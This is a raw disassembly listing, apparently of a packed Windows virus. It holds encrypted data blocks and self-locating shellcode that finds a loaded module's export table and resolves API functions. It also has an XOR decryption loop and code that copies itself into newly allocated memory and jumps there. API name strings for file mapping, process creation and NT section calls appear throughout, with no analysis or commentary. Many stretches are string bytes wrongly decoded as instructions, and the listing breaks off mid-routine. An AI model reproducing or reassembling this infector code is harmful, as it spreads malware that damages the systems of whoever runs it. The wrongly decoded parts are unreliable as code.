		dd 0ADE1C96Ah, 46EBF3E4h, 484B0985h, 0A90FD086h, 20795941h
		dd 48F824A0h, 0EFA4785Bh, 62BE3D17h, 3B921053h,	0D6EAF973h
		dd 0FC1C85F7h, 0A810A030h, 0B22220D7h, 0EFD200F8h, 0DC2801C9h
		dd 78C70959h, 6CD015DCh, 6B09CAB1h, 7AD65026h, 0F4F8F13Bh
		dd 366F00C8h, 0DBBACF9Dh, 42078C2Ah, 0D0D4A562h, 61DCB6FBh
		dd 48955490h, 193ACB9Fh, 86725E46h, 0B22C6EF5h,	0CD2A9E17h
		dd 0E3C1B217h, 0EC931CEh, 57B0397Dh, 7E27D8B0h,	93630B55h
		dd 0EADEA1E2h, 188C7E29h
		dd 39805C93h, 0BE2FC748h, 4DC299E7h, 4123700Fh,	5336F79Dh
		dd 0B2581927h, 0D51066F1h, 0DFBAB092h, 0E8E57E05h, 425A6158h
		dd 0D901F26Ch, 0B5A0275Ah, 5E4AF643h, 0F172505Bh, 0F3B58900h
		dd 70AA4122h, 5B4DEB58h, 3882A342h, 8370C2FDh, 73CD0C6Dh
		dd 32BC10BEh, 3889C810h, 0D68A6DDh, 39465450h, 24EFCA2Bh
		dd 58FD9BCDh, 0DFF78097h, 0E9BEFD46h, 9A27AFE2h, 0CF30CBCDh
		dd 89A75832h, 0A5AF8211h, 35E9AA59h, 686598A0h,	22F0FA6h
		dd 0F951780Ch, 14E6CBBAh, 6C946626h, 2F377FEAh,	6FE7A60Ch
		dd 9379B807h, 8A553590h, 0E7D6004Ah, 0DB9FDE28h, 0DCF6FB3Ah
		dd 4F48651Bh, 20C5A985h, 42F7405Fh, 44CBCA81h, 851B54A2h
		dd 0A4A50EC4h, 0B6F30E6h, 0BF1D522Ch, 237F7F0Eh, 53D46DCFh
		dd 511ED777h, 0F818D990h, 0C90ADFE5h, 5BDD0758h, 0D84E161Eh
		dd 570DEFFh, 1803E3C6h,	1180h dup(0)
; ---------------------------------------------------------------------------
		call	$+5
		cld
		mov	eax, [esp]
		mov	ecx, [eax+29ABh]
		mov	[eax+32F3h], ebx
		and	ecx, 400000h
		mov	ebx, [esp+4]
		jz	short loc_3143004D
		pop	ecx
		mov	[eax+32F7h], esi
		mov	cl, [eax+29AFh]
		mov	[eax+32FBh], edi
		cmp	cl, 0E8h
		jz	short loc_31430041
		mov	ebx, [eax+29B1h]
		jmp	short loc_3143004B
; ---------------------------------------------------------------------------


loc_31430041:				; CODE XREF: UPX2:31430037j
		mov	ecx, [eax+29B0h]
		mov	ebx, [ecx+ebx+2]


loc_3143004B:				; CODE XREF: UPX2:3143003Fj
		mov	ebx, [ebx]


loc_3143004D:				; CODE XREF: UPX2:3143001Fj
		push	ebp
		mov	ebp, eax
		sub	dword ptr [esp+4], 6005h
		sub	ebp, 101005h
		mov	edi, [esp+4]
		lea	esi, [ebp+1039BCh]
		mov	ecx, 0AAh
		rep movsb
		sldt	cx
		test	ecx, ecx
		jnz	short loc_3143007B
		or	eax, 0FFFFFFFFh
		int	2Eh		; DOS 2+ internal - EXECUTE COMMAND
					; DS:SI	-> counted CR-terminated command string


loc_3143007B:				; CODE XREF: UPX2:31430074j
		and	ebx, 0FFFFF000h


loc_31430081:				; CODE XREF: UPX2:31430090j
		cmp	dword ptr [ebx+4Eh], 73696854h
		jz	short loc_31430092


loc_3143008A:				; CODE XREF: UPX2:3143009Fj
		sub	ebx, 100h
		jnz	short loc_31430081


loc_31430092:				; CODE XREF: UPX2:31430088j
		mov	eax, ebx
		add	eax, [ebx+3Ch]
		mov	edx, [eax+78h]
		cmp	word ptr [eax],	4550h
		jnz	short loc_3143008A
		add	edx, ebx
		mov	esi, [edx+20h]
		mov	ecx, [edx+18h]
		add	esi, ebx
		push	ecx


loc_314300AC:				; CODE XREF: UPX2:loc_314300C0j
		lodsd
		add	eax, ebx
		cmp	word ptr [eax+2], 5074h
		jnz	short loc_314300C0
		cmp	dword ptr [eax+5], 6441636Fh
		jz	short loc_314300C5


loc_314300C0:				; CODE XREF: UPX2:314300B5j
		loop	loc_314300AC
		pop	ecx
		jmp	short loc_314300F0
; ---------------------------------------------------------------------------


loc_314300C5:				; CODE XREF: UPX2:314300BEj
		sub	[esp], ecx
		mov	esi, [edx+24h]
		pop	ecx
		add	esi, ebx
		movzx	eax, word ptr [esi+ecx*2]
		mov	edi, [edx+1Ch]
		add	edi, ebx
		mov	esi, [edi+eax*4]
		add	esi, ebx
		lea	eax, [ebp+101137h]
		lea	ecx, [ebp+101120h]
		mov	dx, [eax-19h]
		call	ecx
		jmp	short loc_31430137
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143017E


loc_314300F0:				; CODE XREF: UPX2:314300C3j
					; sub_3143017E+10j ...
		mov	eax, [ebp+1039B0h]
		and	eax, 400000h
		jz	short loc_3143011C
		lea	esi, [ebp+1039B4h]
		lodsd
		mov	edi, [esp+arg_0]
		stosd
		mov	ebx, [ebp+1042F8h]
		movsb
		mov	edi, [ebp+104300h]
		mov	esi, [ebp+1042FCh]


loc_3143011C:				; CODE XREF: sub_3143017E-83j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_3143017E
; ---------------------------------------------------------------------------
		dw 24EEh

; =============== S U B	R O U T	I N E =======================================



sub_31430120	proc near		; CODE XREF: sub_3143244B+2DFp
		push	ebx
		mov	ecx, 2879h
		mov	ebx, edx


loc_31430128:				; CODE XREF: sub_31430120+13j
		xor	[eax], dl
		sub	dl, bl
		add	eax, 1
		xchg	bl, bh
		xchg	dl, dh
		loop	loc_31430128
		pop	ebx
		retn
sub_31430120	endp

; ---------------------------------------------------------------------------


loc_31430137:				; CODE XREF: UPX2:314300EEj
		call	near ptr loc_31430146+2
		inc	ebx
		insb
		outsd
		jnb	short near ptr loc_314301A3+3
		dec	eax
		popa
		outsb
		db	64h
		insb


loc_31430146:				; CODE XREF: UPX2:loc_31430137p
		add	gs:[ebx-1], dl
		setalc
		mov	[ebp+103E52h], eax
		call	near ptr loc_31430162+1
		inc	ebx
		jb	short loc_314301BE
		popa
		jz	short near ptr loc_314301C0+1
		inc	ebp
		jbe	short near ptr loc_314301C0+4
		outsb
		jz	short loc_314301A3


loc_31430162:				; CODE XREF: UPX2:31430151p
		add	[ebx-1], dl
		setalc
		mov	[ebp+103E56h], eax
		call	sub_3143017E
		inc	edi
		db	65h
		jz	short near ptr loc_314301C0+1
		popa
		jnb	short near ptr loc_314301EA+2
		inc	ebp
		jb	short near ptr loc_314301EA+3
		outsd
		jb	short $+2

; =============== S U B	R O U T	I N E =======================================



sub_3143017E	proc near		; CODE XREF: UPX2:3143016Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 314300F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31430524 SIZE 0000000B BYTES

		push	ebx
		call	esi	; lstrcatA
		mov	[ebp+103E5Ah], eax
		call	sub_3143054F
		test	eax, eax
		jz	loc_314300F0
		push	eax
		call	dword ptr [ebp+103E5Ah]
		test	eax, eax
		jnz	loc_31430524


loc_314301A3:				; CODE XREF: UPX2:31430160j
					; UPX2:3143013Fj
		cmp	byte ptr [ebp+10152Fh],	1
		jnz	short loc_314301C0
		push	dword ptr [ebp+1042F8h]
		dec	byte ptr [ebp+10152Fh]
		pop	dword ptr [ebp+101588h]


loc_314301BE:				; CODE XREF: UPX2:31430157j
		jmp	short loc_314301C7
; ---------------------------------------------------------------------------


loc_314301C0:				; CODE XREF: sub_3143017E+2Cj
					; UPX2:3143015Aj ...
		and	dword ptr [ebp+101588h], 0


loc_314301C7:				; CODE XREF: sub_3143017E:loc_314301BEj
		and	dword ptr [ebp+101578h], 0
		and	dword ptr [ebp+10157Ch], 0
		and	dword ptr [ebp+101580h], 0
		push	edi
		mov	byte ptr [ebp+1012D4h],	1
		mov	[ebp+103E5Eh], esi


loc_314301EA:				; CODE XREF: UPX2:31430176j
					; UPX2:31430179j
		lea	esi, [ebp+1015F4h]
		xor	ecx, ecx
		lea	edi, [ebp+103E6Ah]
		mov	cl, 20h
		call	sub_3143058C
		pop	edi
		call	dword ptr [ebp+103EAAh]
		shr	eax, 1Fh
		jz	loc_314302E3
		mov	eax, [edi+14h]
		push	40h
		add	eax, ebx
		push	8001000h
		mov	[ebp+103E62h], eax
		push	7318h
		push	0
		call	dword ptr [ebp+103EE2h]
		test	eax, eax
		jz	loc_31430524
		xchg	eax, edi
		lea	esi, [ebp+101000h]
		mov	ebp, edi
		mov	ecx, 0CC6h
		sub	ebp, 101000h
		lea	edx, [ebp+101254h]
		rep movsd
		jmp	edx
; ---------------------------------------------------------------------------
		sub	esp, 20h
		mov	edi, esp
		push	8
		xor	eax, eax
		pop	ecx
		lea	edx, [ebp+101B3Dh]
		rep stosd
		mov	edi, esp
		mov	[edi+10h], edx
		inc	byte ptr [edi+1Ch]
		push	edi
		push	10003h
		call	dword ptr [ebp+103E62h]
		add	esp, 20h
		test	eax, eax
		jz	loc_31430524
		xchg	eax, edi
		push	0
		push	1
		push	80000400h
		push	10000h
		call	dword ptr [ebp+103E62h]
		test	eax, eax
		jz	loc_31430524
		push	0
		push	eax
		push	40000h
		push	0
		shr	eax, 0Ch
		push	edi
		push	1
		push	eax
		push	10001h
		call	dword ptr [ebp+103E62h]
		push	1000Ah
		call	dword ptr [ebp+103E62h]
		call	loc_314302D3
		jmp	loc_31430524
; ---------------------------------------------------------------------------


loc_314302D3:				; CODE XREF: sub_3143017E+14Bp
					; sub_3143017E+162j
		push	0
		pop	ecx
		jecxz	short locret_314302E2
		push	0Ah
		call	dword ptr [ebp+103ED6h]
		jmp	short loc_314302D3
; ---------------------------------------------------------------------------

locret_314302E2:			; CODE XREF: sub_3143017E+158j
		retn
; ---------------------------------------------------------------------------


loc_314302E3:				; CODE XREF: sub_3143017E+8Bj
		cmp	dword ptr [ebp+103E82h], 0
		jz	loc_31430524
		call	near ptr loc_314302FA+1
		dec	esi
		push	esp
		inc	esp
		dec	esp
		dec	esp


loc_314302FA:				; CODE XREF: sub_3143017E+172p
		add	bh, bh
sub_3143017E	endp ; sp-analysis failed

		xchg	eax, ebp
		sahf
		db	3Eh
		adc	[eax], al
		lea	esi, [ebp+1017CEh]
		xor	ecx, ecx
		lea	edi, [ebp+103EEAh]
		mov	cl, 0Eh
		xchg	eax, ebx
		call	sub_3143058C
		cmp	dword ptr [ebp+103F1Eh], 0
		jz	loc_31430524
		mov	eax, [ebp+103EEEh]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+103907h]
		mov	eax, [ebp+103F06h]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+103954h]
		mov	eax, [ebp+103EF2h]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+10395Bh]
		mov	ecx, [ebp+103EF6h]
		jecxz	short loc_31430373
		push	dword ptr [ecx+1]
		pop	dword ptr [ebp+103968h]
		mov	ecx, [ebp+103EFEh]
		jecxz	short loc_31430373
		push	dword ptr [ecx+1]
		pop	dword ptr [ebp+103975h]


loc_31430373:				; CODE XREF: UPX2:31430357j
					; UPX2:31430368j
		call	sub_31430530
		lea	edi, [ebp+103F74h]
		mov	ecx, edi
		push	0
		neg	cl
		push	dword ptr [eax+4]
		and	ecx, 3
		push	40h
		add	edi, ecx
		push	edi
		push	0
		push	18h
		lea	esi, [ebp+1015DBh]
		mov	ecx, 19h
		lea	eax, ds:0FFFFFFFEh[ecx*2]
		stosw
		lea	eax, ds:0[ecx*2]
		stosw
		lea	eax, [edi+4]
		stosd
		xor	ah, ah
		lea	edx, [ebp+103E20h]


loc_314303BC:				; CODE XREF: UPX2:314303C5j
		lodsb
		mov	[edx], ax
		stosw
		add	edx, 2
		loop	loc_314303BC
		mov	edx, esp
		push	0
		push	7318h
		mov	ecx, esp
		push	0
		mov	eax, esp
		push	0
		push	8000000h
		push	40h
		push	ecx
		push	edx
		push	0Eh
		push	eax
		call	dword ptr [ebp+103EFAh]
		pop	eax
		add	esp, 40h
		push	7318h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	40h
		push	0
		push	2
		push	edx
		push	0
		push	7318h
		push	0
		push	ecx
		push	0FFFFFFFFh
		push	eax
		call	dword ptr [ebp+103F02h]
		pop	edi
		pop	ecx
		test	edi, edi
		jz	loc_31430524
		lea	esi, [ebp+101000h]
		mov	ecx, 0CC6h
		mov	ebp, edi
		rep movsd
		sub	ebp, 101000h
		lea	eax, [ebp+10143Ah]
		jmp	eax
; ---------------------------------------------------------------------------
		dw 5450h
		dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh
		dd 11E8h, 44655300h, 67756265h,	76697250h, 67656C69h, 0E8570065h
		dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh,	5295FF57h, 6A00103Eh
		dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h
		dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h
		dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
		dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh,	33000005h
		dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h
		dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh
		dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h
		dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h
		dd 103E52h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143017E


loc_31430524:				; CODE XREF: sub_3143017E+1Fj
					; sub_3143017E+B2j ...
		call	dword ptr [ebp+103E52h]
		jmp	loc_314300F0
; END OF FUNCTION CHUNK	FOR sub_3143017E
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_31430530	proc near		; CODE XREF: UPX2:loc_31430373p
					; sub_3143054F+2p
		pop	edx
		push	0
		push	0
		push	0
		push	0
		push	40001h
		mov	eax, esp
		push	0
		push	eax
		push	0Ch
		mov	eax, esp
		jmp	edx
sub_31430530	endp

; ---------------------------------------------------------------------------
aVx_4		db 'Vx_4',0
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_3143054F	proc near		; CODE XREF: sub_3143017E+9p
		xor	ecx, ecx
		call	sub_31430530
		lea	edx, [ebp+101549h]
		push	edx
		push	ecx
		push	ecx
		push	eax
		call	dword ptr [ebp+103E56h]
		add	esp, 20h
		retn
sub_3143054F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 585858h, 3318h, 0E63h, 1, 2 dup(0)
		dd 29B0h, 0

; =============== S U B	R O U T	I N E =======================================



sub_3143058C	proc near		; CODE XREF: sub_3143017E+7Cp
					; UPX2:31430312p ...
		push	ecx
		push	esi
		push	ebx
		call	dword ptr [ebp+103E5Eh]
		stosd
		pop	ecx


loc_31430597:				; CODE XREF: sub_3143058C+Ej
		lodsb
		test	al, al
		jnz	short loc_31430597
		loop	sub_3143058C
		retn
sub_3143058C	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143059F	proc near		; CODE XREF: sub_3143211D+25p

; FUNCTION CHUNK AT 31430629 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 314309F9 SIZE 00000027 BYTES

		lea	edx, [ebp+101975h]
		push	edx
		call	dword ptr [ebp+103EB6h]
		mov	[ebp+104278h], eax
		call	near ptr loc_314305CC+1
		dec	esp
		outsd
		outsd
		imul	esi, [ebp+70h],	50h
		jb	short loc_31430629
		jbe	short near ptr loc_31430629+2
		insb
		db	65h, 67h, 65h
		push	esi
		popa
		insb
		jnz	short loc_31430630
		inc	ecx


loc_314305CC:				; CODE XREF: sub_3143059F+13p
		add	[eax-1], dl
sub_3143059F	endp ; sp-analysis failed

		xchg	eax, ebp
		pop	esi
		db	3Eh
		adc	[eax], al
		mov	[ebp+10427Ch], eax
		retn
; ---------------------------------------------------------------------------
		db  5Ch	; \
		db  42h	; B
		db  61h	; a
		db  73h	; s
		db  65h	; e
		db  4Eh	; N
		db  61h	; a
		db  6Dh	; m
		db  65h	; e
		db  64h	; d
		db  4Fh	; O
		db  62h	; b
		db  6Ah	; j
		db  65h	; e
		db  63h	; c
		db  74h	; t
		db  73h	; s
		db  5Ch	; \
		db  56h	; V
		db  74h	; t
		db  53h	; S
		db  65h	; e
		db  63h	; c
		db  74h	; t
		db    0
		db  6Ch	; l
		db  73h	; s
		db  74h	; t
		db  72h	; r
		db  6Ch	; l
		db  65h	; e
		db  6Eh	; n
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  46h	; F
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  41h	; A
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  46h	; F
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  4Dh	; M
		db  61h	; a
		db  70h	; p
		db  70h	; p
		db  69h	; i
		db  6Eh	; n
		db  67h	; g
		db  41h	; A
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  50h	; P
		db  72h	; r
		db  6Fh	; o
		db  63h	; c
		db  65h	; e
		db  73h	; s
		db  73h	; s
		db  41h	; A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143059F


loc_31430629:				; CODE XREF: sub_3143059F+1Fj
					; sub_3143059F+21j
		add	[ebx+72h], al
		db	65h
		popa
		jz	short near ptr loc_31430693+2


loc_31430630:				; CODE XREF: sub_3143059F+2Aj
		push	edx
		db	65h
		insd
		outsd
		jz	short loc_3143069B
		push	esp
		push	64616572h
		add	[ebx+72h], al
		db	65h
		popa
		jz	short near ptr loc_314306A6+2
		push	esp
		push	64616572h
		add	[ebx+72h], al
		db	65h
		popa
		jz	short near ptr loc_314306B2+3
		push	esp
		outsd
		outsd
		insb
		push	33706C65h
		xor	dl, [ebx+6Eh]
		popa
		jo	short near ptr loc_314306D1+1
		push	4500746Fh
		js	short loc_314306CF
		jz	short near ptr loc_314306BB+1
		push	64616572h
		add	[esi+69h], al
		insb
		db	65h
		push	esp
		imul	ebp, [ebp+65h],	79536F54h
		jnb	short loc_314306F0
		db	65h
		insd
		push	esp
		imul	ebp, [ebp+65h],	65724600h
		db	65h
		dec	esp
		imul	esp, [edx+72h],	797261h
		inc	edi
		db	65h
		jz	short near ptr loc_314306D3+6


loc_31430693:				; CODE XREF: sub_3143059F+8Fj
		imul	ebp, [ebp+41h],	69727474h


loc_3143069B:				; CODE XREF: sub_3143059F+95j
		bound	esi, [ebp+74h]
		db	65h
		jnb	short loc_314306E2
		add	[edi+65h], al
		jz	short near ptr loc_314306EB+1


loc_314306A6:				; CODE XREF: sub_3143059F+A2j
		imul	ebp, [ebp+53h],	657A69h
		inc	edi
		db	65h
		jz	short loc_314306F8


loc_314306B2:				; CODE XREF: sub_3143059F+AFj
		imul	ebp, [ebp+54h],	656D69h
		inc	edi


loc_314306BB:				; CODE XREF: sub_3143059F+C7j
		db	65h
		jz	short near ptr loc_3143070A+1
		outsd
		db	64h
		jnz	short near ptr loc_31430729+5
		db	65h
		dec	eax
		popa
		outsb
		db	64h
		insb
		db	65h
		inc	ecx
		add	[edi+65h], al
		jz	short near ptr loc_3143071D+6


loc_314306CF:				; CODE XREF: sub_3143059F+C5j
		db	65h
		insd


loc_314306D1:				; CODE XREF: sub_3143059F+BEj
		jo	short near ptr loc_31430717+2


loc_314306D3:				; CODE XREF: sub_3143059F+F1j
		imul	ebp, [ebp+4Eh],	41656D61h
		add	[edi+65h], al
		jz	short near ptr loc_31430731+3
		db	65h
		insd


loc_314306E2:				; CODE XREF: sub_3143059F+FFj
		jo	short near ptr loc_31430731+3
		popa
		jz	short near ptr loc_3143074E+1
		inc	ecx
		add	[edi+65h], al


loc_314306EB:				; CODE XREF: sub_3143059F+105j
		jz	short loc_31430743
		db	65h
		jb	short near ptr loc_31430762+1


loc_314306F0:				; CODE XREF: sub_3143059F+DBj
		imul	ebp, [edi+6Eh],	74654700h
		push	esi


loc_314306F8:				; CODE XREF: sub_3143059F+110j
		db	65h
		jb	short near ptr loc_3143076C+2
		imul	ebp, [edi+6Eh],	417845h
		inc	edi
		db	65h
		jz	short near ptr loc_3143075B+1
		outsd
		insb
		jnz	short near ptr loc_31430771+6


loc_3143070A:				; CODE XREF: sub_3143059F:loc_314306BBj
		db	65h
		dec	ecx
		outsb
		outsw
		jb	short near ptr loc_3143077C+2
		popa
		jz	short near ptr loc_3143077C+1
		outsd
		outsb
		inc	ecx


loc_31430717:				; CODE XREF: sub_3143059F:loc_314306D1j
		add	[edi+ebp*2+61h], cl
		db	64h
		dec	esp


loc_3143071D:				; CODE XREF: sub_3143059F+12Ej
		imul	esp, [edx+72h],	41797261h
		add	[ebp+61h], cl
		jo	short loc_3143077F


loc_31430729:				; CODE XREF: sub_3143059F+120j
		imul	esp, [ebp+77h],	6946664Fh
		insb


loc_31430731:				; CODE XREF: sub_3143059F+13Fj
					; sub_3143059F:loc_314306E2j
		add	gs:[edi+70h], cl
		outs	dx, byte ptr gs:[esi]
		inc	esi
		imul	ebp, [ebp+4Dh],	69707061h
		outsb
		db	67h
		inc	ecx


loc_31430743:				; CODE XREF: sub_3143059F:loc_314306EBj
		add	[edi+70h], cl
		outs	dx, byte ptr gs:[esi]
		push	eax
		jb	short near ptr loc_314307B9+1
		arpl	[ebp+73h], sp


loc_3143074E:				; CODE XREF: sub_3143059F+146j
		jnb	short $+2
		push	eax
		jb	short loc_314307C2
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31430784+7
		xor	al, [esi+69h]


loc_3143075B:				; CODE XREF: sub_3143059F+164j
		jb	short near ptr loc_314307CA+6
		jz	short $+2
		push	eax
		jb	short near ptr loc_314307CA+7


loc_31430762:				; CODE XREF: sub_3143059F+14Ej
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31430799+1
		xor	cl, [esi+65h]
		js	short near ptr loc_314307DC+4


loc_3143076C:				; CODE XREF: sub_3143059F:loc_314306F8j
		add	[ebx+65h], dl
		jz	short near ptr loc_314307B5+2


loc_31430771:				; CODE XREF: sub_3143059F+169j
		imul	ebp, [ebp+41h],	69727474h
		bound	esi, [ebp+74h]


loc_3143077C:				; CODE XREF: sub_3143059F+173j
					; sub_3143059F+170j
		db	65h
		jnb	short loc_314307C0


loc_3143077F:				; CODE XREF: sub_3143059F+188j
		add	[ebx+65h], dl
		jz	short loc_314307CA


loc_31430784:				; CODE XREF: sub_3143059F+1B7j
		imul	ebp, [ebp+54h],	656D69h
		push	ebx
		insb
		db	65h, 65h
		jo	short $+4
		push	ebx
		jns	short loc_31430808
		jz	short loc_314307FC
		insd
		push	esp


loc_31430799:				; CODE XREF: sub_3143059F+1C6j
		imul	ebp, [ebp+65h],	69466F54h
		insb
		db	65h
		push	esp
		imul	ebp, [ebp+65h],	6D6E5500h
		popa
		jo	short loc_31430803
		imul	esp, [ebp+77h],	6946664Fh
		insb


loc_314307B5:				; CODE XREF: sub_3143059F+1D0j
		add	gs:[esi+69h], dl


loc_314307B9:				; CODE XREF: sub_3143059F+1AAj
		jb	short near ptr loc_3143082E+1
		jnz	short loc_3143081E
		insb
		inc	ecx
		insb


loc_314307C0:				; CODE XREF: sub_3143059F:loc_3143077Cj
		insb
		outsd


loc_314307C2:				; CODE XREF: sub_3143059F+1B2j
		arpl	[eax], ax
		push	edi
		jb	short loc_31430830
		jz	short loc_3143082E
		inc	esi


loc_314307CA:				; CODE XREF: sub_3143059F+1E3j
					; sub_3143059F:loc_3143075Bj ...
		imul	ebp, [ebp+0], 6441744Eh
		push	75h
		jnb	short loc_3143084A
		push	eax
		jb	short near ptr loc_3143083F+3
		jbe	short near ptr loc_3143083F+5
		insb


loc_314307DC:				; CODE XREF: sub_3143059F+1CBj
		db	65h, 67h, 65h
		jnb	near ptr 835h
		outsd
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_3143082B+1
		jb	short near ptr loc_3143084F+1
		popa
		jz	short loc_31430853
		inc	esi
		imul	ebp, [ebp+0], 7243744Eh
		db	65h
		popa
		jz	short loc_31430860
		push	eax


loc_314307FC:				; CODE XREF: sub_3143059F+1F6j
		jb	short loc_3143086D
		arpl	[ebp+73h], sp
		jnb	short $+2


loc_31430803:				; CODE XREF: sub_3143059F+20Cj
		dec	esi
		jz	short near ptr loc_31430846+3
		jb	short loc_3143086D


loc_31430808:				; CODE XREF: sub_3143059F+1F4j
		popa
		jz	short loc_31430870
		push	eax
		jb	short loc_3143087D
		arpl	[ebp+73h], sp
		jnb	short near ptr loc_31430853+5
		js	short $+2
		dec	esi
		jz	short loc_3143085B
		jb	short loc_3143087F
		popa
		jz	short near ptr loc_3143087F+3
		push	ebx


loc_3143081E:				; CODE XREF: sub_3143059F+21Cj
		arpl	gs:[ecx+ebp*2+6Fh], si
		outsb
		add	[esi+74h], cl
		inc	ebx
		jb	short near ptr loc_3143088E+1
		popa


loc_3143082B:				; CODE XREF: sub_3143059F+248j
		jz	short loc_31430892
		push	ebp


loc_3143082E:				; CODE XREF: sub_3143059F+228j
					; sub_3143059F:loc_314307B9j
		jnb	short near ptr loc_31430894+1


loc_31430830:				; CODE XREF: sub_3143059F+226j
		jb	short near ptr loc_3143087F+3
		jb	short loc_314308A3
		arpl	[ebp+73h], sp
		jnb	short $+2
		dec	esi
		jz	short loc_31430889
		popa
		jo	short near ptr loc_31430894+1


loc_3143083F:				; CODE XREF: sub_3143059F+238j
					; sub_3143059F+23Aj
		imul	esp, [ebp+77h],	6553664Fh


loc_31430846:				; CODE XREF: sub_3143059F+265j
		arpl	[ecx+ebp*2+6Fh], si


loc_3143084A:				; CODE XREF: sub_3143059F+235j
		outsb
		add	[esi+74h], cl
		dec	edi


loc_3143084F:				; CODE XREF: sub_3143059F+24Aj
		jo	short loc_314308B6
		outsb
		inc	esi


loc_31430853:				; CODE XREF: sub_3143059F+24Dj
					; sub_3143059F+272j
		imul	ebp, [ebp+0], 704F744Eh


loc_3143085B:				; CODE XREF: sub_3143059F+277j
		outs	dx, byte ptr gs:[esi]
		push	eax
		jb	short loc_314308CF


loc_31430860:				; CODE XREF: sub_3143059F+25Aj
		arpl	[ebp+73h], sp
		jnb	short loc_314308B9
		outsd
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_314308BB+1


loc_3143086D:				; CODE XREF: sub_3143059F:loc_314307FCj
					; sub_3143059F+267j
		jo	short near ptr loc_314308D3+1
		outsb


loc_31430870:				; CODE XREF: sub_3143059F+26Aj
		push	ebx
		arpl	gs:[ecx+ebp*2+6Fh], si
		outsb
		add	[esi+74h], cl
		push	eax
		jb	short near ptr loc_314308EB+1


loc_3143087D:				; CODE XREF: sub_3143059F+26Dj
		jz	short near ptr loc_314308E3+1


loc_3143087F:				; CODE XREF: sub_3143059F+279j
					; sub_3143059F+27Cj ...
		arpl	[esi+edx*2+69h], si
		jb	short loc_314308F9
		jnz	short near ptr loc_314308E7+1
		insb
		dec	ebp


loc_31430889:				; CODE XREF: sub_3143059F+29Bj
		db	65h
		insd
		outsd
		jb	short near ptr loc_31430904+3


loc_3143088E:				; CODE XREF: sub_3143059F+289j
		add	[esi+74h], cl
		push	ecx


loc_31430892:				; CODE XREF: sub_3143059F:loc_3143082Bj
		jnz	short loc_314308F9


loc_31430894:				; CODE XREF: sub_3143059F:loc_3143082Ej
					; sub_3143059F+29Ej
		jb	short near ptr loc_3143090E+1
		dec	ecx
		outsb
		outsw
		jb	short near ptr loc_31430908+1
		popa
		jz	short loc_31430908
		outsd
		outsb
		push	esp
		outsd


loc_314308A3:				; CODE XREF: sub_3143059F+293j
		imul	esp, [ebp+6Eh],	0
		dec	esi
		jz	short near ptr loc_314308FF+2
		jb	short loc_31430915
		jz	short near ptr loc_31430912+1
		push	esi
		imul	esi, [edx+74h],	4D6C6175h


loc_314308B6:				; CODE XREF: sub_3143059F:loc_3143084Fj
		db	65h
		insd
		outsd


loc_314308B9:				; CODE XREF: sub_3143059F+2C4j
		jb	short loc_31430934


loc_314308BB:				; CODE XREF: sub_3143059F+2CCj
		add	[edx+74h], dl
		insb
		push	ebp
		outsb
		imul	esp, [ebx+6Fh],	74536564h
		jb	short near ptr loc_31430931+2
		outsb
		db	67h
		push	esp
		outsd
		inc	ecx


loc_314308CF:				; CODE XREF: sub_3143059F+2BFj
		outsb
		jnb	short near ptr loc_3143093A+1
		push	ebx


loc_314308D3:				; CODE XREF: sub_3143059F:loc_3143086Dj
		jz	short loc_31430947
		imul	ebp, [esi+67h],	41535700h
		push	ebx
		jz	short loc_31430940
		jb	short loc_31430955
		jnz	short near ptr loc_31430952+1


loc_314308E3:				; CODE XREF: sub_3143059F:loc_3143087Dj
		add	[ebx+6Ch], ah
		outsd


loc_314308E7:				; CODE XREF: sub_3143059F+2E6j
		jnb	short loc_3143094E
		jnb	short near ptr loc_31430959+1


loc_314308EB:				; CODE XREF: sub_3143059F+2DCj
		arpl	[ebx+65h], bp
		jz	short $+2
		arpl	[edi+6Eh], bp
		outsb
		arpl	gs:[eax+eax+67h], si


loc_314308F9:				; CODE XREF: sub_3143059F+2E4j
					; sub_3143059F:loc_31430892j
		db	65h
		jz	short near ptr loc_31430963+1
		outsd
		jnb	short near ptr loc_31430971+2


loc_314308FF:				; CODE XREF: sub_3143059F+309j
		bound	edi, [ecx+6Eh]
		popa
		insd


loc_31430904:				; CODE XREF: sub_3143059F+2EDj
		add	gs:[edx+65h], dh


loc_31430908:				; CODE XREF: sub_3143059F+2FEj
					; sub_3143059F+2FBj
		arpl	[esi+0], si
